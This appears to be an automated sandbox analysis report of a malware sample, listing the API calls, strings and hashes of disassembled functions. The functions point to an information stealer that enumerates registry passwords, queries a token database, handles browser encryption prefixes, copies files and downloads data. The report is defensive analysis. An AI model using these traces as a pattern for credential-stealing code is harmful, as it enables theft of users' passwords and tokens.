                    • Instruction Fuzzy Hash: 4C710DB9A40208ABDB14EFE4DD84FEEB7B9FF49704F109508F605A7290DB74A905CB61
                    APIs
                    • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                    • memset.MSVCRT ref: 0041716A
                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                    Strings
                    • sA, xrefs: 004172AE, 00417179, 0041717C
                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                    • sA, xrefs: 00417111
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: OpenProcesslstrcpymemset
                    • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                    • API String ID: 224852652-2614523144
                    • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                    • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                    • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                    • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 040B77A9
                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 040B77E6
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 040B786A
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040B7871
                    • wsprintfA.USER32 ref: 040B78A7
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                    • String ID: :$C$\$B
                    • API String ID: 1544550907-183544611
                    • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                    • Instruction ID: 159ca3a9698f71d2b5d43d5e1dc1bb1996bffaeb1b9fe1dc8ab86c9519679432
                    • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                    • Instruction Fuzzy Hash: 424191B1E40258EBDF10DF94CC45BEEBBB9EF48704F004199E545B7280E7756A84CBAA
                    APIs
                      • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                      • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                      • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                      • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                      • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                      • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                    • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                    • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                    • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                    • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                    • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                    • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                    • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                    • task.LIBCPMTD ref: 004076FB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                    • String ID: :
                    • API String ID: 3191641157-3653984579
                    • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                    • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                    • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                    • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                    APIs
                    • lstrcpy.KERNEL32(?,?), ref: 040B1642
                      • Part of subcall function 040B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 040B9072
                      • Part of subcall function 040B94C7: StrStrA.SHLWAPI(?,?), ref: 040B94D3
                    • lstrcpy.KERNEL32(?,00000000), ref: 040B167E
                      • Part of subcall function 040B94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 040B94F7
                      • Part of subcall function 040B94C7: lstrlen.KERNEL32(?), ref: 040B950E
                      • Part of subcall function 040B94C7: wsprintfA.USER32 ref: 040B952E
                    • lstrcpy.KERNEL32(?,00000000), ref: 040B16C6
                    • lstrcpy.KERNEL32(?,00000000), ref: 040B170E
                    • lstrcpy.KERNEL32(?,00000000), ref: 040B1755
                    • lstrcpy.KERNEL32(?,00000000), ref: 040B179D
                    • lstrcpy.KERNEL32(?,00000000), ref: 040B17E5
                    • lstrcpy.KERNEL32(?,00000000), ref: 040B182C
                    • lstrcpy.KERNEL32(?,00000000), ref: 040B1874
                      • Part of subcall function 040BAA87: lstrlen.KERNEL32(040A516C,?,?,040A516C,00420DDE), ref: 040BAA92
                      • Part of subcall function 040BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 040BAAEC
                    • strtok_s.MSVCRT ref: 040B19B7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                    • String ID:
                    • API String ID: 4276352425-0
                    • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                    • Instruction ID: b42f31b6a930764727ec01869ec122f0e6d9d87ce0f311c802961383ab5374ea
                    • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                    • Instruction Fuzzy Hash: 2771A6B2951118ABDB14EBB0DC88EEE7379AF54308F044598E24DB2150EF75BB84CFA5
                    APIs
                    • memset.MSVCRT ref: 00407314
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                    • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                    • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                      • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                    • task.LIBCPMTD ref: 00407555
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                    • String ID: Password
                    • API String ID: 2698061284-3434357891
                    • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                    • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                    • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                    • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                    APIs
                    • lstrcatA.KERNEL32(?,024EBE10,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                    • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                    • lstrcatA.KERNEL32(?,?), ref: 00414820
                    • lstrcatA.KERNEL32(?,?), ref: 00414834
                    • lstrcatA.KERNEL32(?,024B9CF0), ref: 00414847
                    • lstrcatA.KERNEL32(?,?), ref: 0041485B
                    • lstrcatA.KERNEL32(?,024EC030), ref: 0041486F
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                      • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                      • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                      • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                      • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                    • String ID: 0aA
                    • API String ID: 167551676-2786531170
                    • Opcode ID: 90fab53855280a57fda400dfd0302278240fe8fa9e8df30b63c428c3d2f2dbd2
                    • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                    • Opcode Fuzzy Hash: 90fab53855280a57fda400dfd0302278240fe8fa9e8df30b63c428c3d2f2dbd2
                    • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,024EBC90,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,024EBC90,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                    • __aulldiv.LIBCMT ref: 00418172
                    • __aulldiv.LIBCMT ref: 00418180
                    • wsprintfA.USER32 ref: 004181AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                    • String ID: %d MB$@
                    • API String ID: 2886426298-3474575989
                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                    • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                    • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                    • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                    APIs
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A51
                      • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A68
                      • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A7F
                      • Part of subcall function 040A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 040A4AA0
                      • Part of subcall function 040A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 040A4AB0
                    • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 040A6376
                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 040A63AE
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 040A63F6
                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 040A641A
                    • InternetReadFile.WININET(?,?,00000400,?), ref: 040A6443
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 040A6471
                    • CloseHandle.KERNEL32(?,?,00000400), ref: 040A64B0
                    • InternetCloseHandle.WININET(?), ref: 040A64BA
                    • InternetCloseHandle.WININET(00000000), ref: 040A64C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                    • String ID:
                    • API String ID: 4287319946-0
                    • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                    • Instruction ID: 1cca5b1dbf1713d4f5561f5e7f43ab984122ad15b7dd0a26216eedb7945c5ecf
                    • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                    • Instruction Fuzzy Hash: 8E516DB5A40218ABEB20DFA0CC44BEE77B9AB44705F048498B645B71C0DBB57A85CFA5
                    APIs
                    • memset.MSVCRT ref: 040B4FEE
                      • Part of subcall function 040B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 040B9072
                    • lstrcat.KERNEL32(?,00000000), ref: 040B5017
                    • lstrcat.KERNEL32(?,00421000), ref: 040B5034
                      • Part of subcall function 040B4B77: wsprintfA.USER32 ref: 040B4B93
                      • Part of subcall function 040B4B77: FindFirstFileA.KERNEL32(?,?), ref: 040B4BAA
                    • memset.MSVCRT ref: 040B507A
                    • lstrcat.KERNEL32(?,00000000), ref: 040B50A3
                    • lstrcat.KERNEL32(?,00421020), ref: 040B50C0
                      • Part of subcall function 040B4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 040B4BD8
                      • Part of subcall function 040B4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 040B4BEE
                      • Part of subcall function 040B4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 040B4DE4
                      • Part of subcall function 040B4B77: FindClose.KERNEL32(000000FF), ref: 040B4DF9
                    • memset.MSVCRT ref: 040B5106
                    • lstrcat.KERNEL32(?,00000000), ref: 040B512F
                    • lstrcat.KERNEL32(?,00421038), ref: 040B514C
                      • Part of subcall function 040B4B77: wsprintfA.USER32 ref: 040B4C17
                      • Part of subcall function 040B4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 040B4C2C
                      • Part of subcall function 040B4B77: wsprintfA.USER32 ref: 040B4C49
                      • Part of subcall function 040B4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 040B4C85
                      • Part of subcall function 040B4B77: lstrcat.KERNEL32(?,0064A524), ref: 040B4CB1
                      • Part of subcall function 040B4B77: lstrcat.KERNEL32(?,00420FF8), ref: 040B4CC3
                      • Part of subcall function 040B4B77: lstrcat.KERNEL32(?,?), ref: 040B4CD7
                      • Part of subcall function 040B4B77: lstrcat.KERNEL32(?,00420FFC), ref: 040B4CE9
                      • Part of subcall function 040B4B77: lstrcat.KERNEL32(?,?), ref: 040B4CFD
                      • Part of subcall function 040B4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 040B4D13
                      • Part of subcall function 040B4B77: DeleteFileA.KERNEL32(?), ref: 040B4D98
                    • memset.MSVCRT ref: 040B5192
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID:
                    • API String ID: 4017274736-0
                    • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                    • Instruction ID: 27488f0d4fc5118f1d50d459215ec32695e7fee117e740e9eb8778ec41d4aa99
                    • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                    • Instruction Fuzzy Hash: 4F41D579B402146BEB10F7B0EC46FDD3738AB24709F404494A6C5760C0EEB967D88BA6
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 040B8397
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040B839E
                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 040B83BF
                    • __aulldiv.LIBCMT ref: 040B83D9
                    • __aulldiv.LIBCMT ref: 040B83E7
                    • wsprintfA.USER32 ref: 040B8413
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                    • String ID: @
                    • API String ID: 2774356765-2766056989
                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                    • Instruction ID: a22e88d0b17f7b28569f29d8ec693109e4873de77bf0f5189eb367d052b1d69d
                    • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                    • Instruction Fuzzy Hash: D5214DB1E44219ABEB00DFD4CC49FEEB7B9FB44B04F104509F605BB280D77869008BA9
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                    • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                    • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                    • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 1440504306-1079375795
                    • Opcode ID: 81e398efcfbfc8fe05c3abd80452661048b9528cba03a89cf09ad618d51ebfe1
                    • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                    • Opcode Fuzzy Hash: 81e398efcfbfc8fe05c3abd80452661048b9528cba03a89cf09ad618d51ebfe1
                    • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$DefaultLangUser
                    • String ID: B
                    • API String ID: 1494266314-2248957098
                    • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                    • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                    • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                    • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                    APIs
                    • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                    • memset.MSVCRT ref: 00409EE8
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 1977917189-1096346117
                    • Opcode ID: 52aad43c17d0cbd30e11a3ec8f47cb803a99a369085b5cf2d06df9b2f190a506
                    • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                    • Opcode Fuzzy Hash: 52aad43c17d0cbd30e11a3ec8f47cb803a99a369085b5cf2d06df9b2f190a506
                    • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                    APIs
                      • Part of subcall function 040A7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 040A75A1
                      • Part of subcall function 040A7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 040A7618
                      • Part of subcall function 040A7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 040A7674
                      • Part of subcall function 040A7537: GetProcessHeap.KERNEL32(00000000,?), ref: 040A76B9
                      • Part of subcall function 040A7537: HeapFree.KERNEL32(00000000), ref: 040A76C0
                    • lstrcat.KERNEL32(0064A668,004217FC), ref: 040A786D
                    • lstrcat.KERNEL32(0064A668,00000000), ref: 040A78AF
                    • lstrcat.KERNEL32(0064A668,00421800), ref: 040A78C1
                    • lstrcat.KERNEL32(0064A668,00000000), ref: 040A78F6
                    • lstrcat.KERNEL32(0064A668,00421804), ref: 040A7907
